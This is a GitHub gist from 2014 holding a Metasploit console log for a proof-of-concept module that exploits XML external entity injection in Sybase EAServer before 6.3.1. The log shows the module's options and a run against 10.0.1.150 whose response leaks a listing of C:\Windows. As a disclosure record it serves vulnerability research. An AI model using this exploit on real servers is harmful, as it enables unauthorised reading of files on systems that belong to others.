Created
December 3, 2014 08:15
-
-
Save y3dips/f73dbefdb12211abcd4c to your computer and use it in GitHub Desktop.
POC sybase_xml_inject exploit
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
msf auxiliary(sybase_xml_inject) > info | |
Name: Sybase XML External Entity Injection | |
Module: auxiliary/scanner/test/sybase_xml_inject | |
License: Metasploit Framework License (BSD) | |
Rank: Normal | |
Provided by: | |
y3dips | |
Basic options: | |
Name Current Setting Required Description | |
---- --------------- -------- ----------- | |
FILE C:\Windows yes File to read | |
Proxies no Use a proxy chain | |
RHOSTS 10.0.1.150 yes The target address range or CIDR identifier | |
RPORT 8000 yes The target port | |
THREADS 1 yes The number of concurrent threads | |
VHOST no HTTP server virtual host | |
Description: | |
Multiple vulnerabilities Sybase EAServer < 6.3.1 -- XML External | |
Entity Injection | |
References: | |
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm | |
msf auxiliary(sybase_xml_inject) > exploit | |
[*] <?xml version="1.0" encoding="UTF-8"?> | |
<testDataTypesResponse> | |
<booleanValue>false</booleanValue> | |
<byteValue>0</byteValue> | |
<charValue></charValue> | |
<doubleValue>0.0</doubleValue> | |
<floatValue>0.0</floatValue> | |
<intValue>0</intValue> | |
<longValue>0</longValue> | |
<shortValue>0</shortValue> | |
<stringValue>AppCompat | |
AppPatch | |
aprpmnt.ini | |
assembly | |
bfsvc.exe | |
Boot | |
bootstat.dat | |
Branding | |
Cursors | |
debug | |
diagnostics | |
DigitalLocker |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment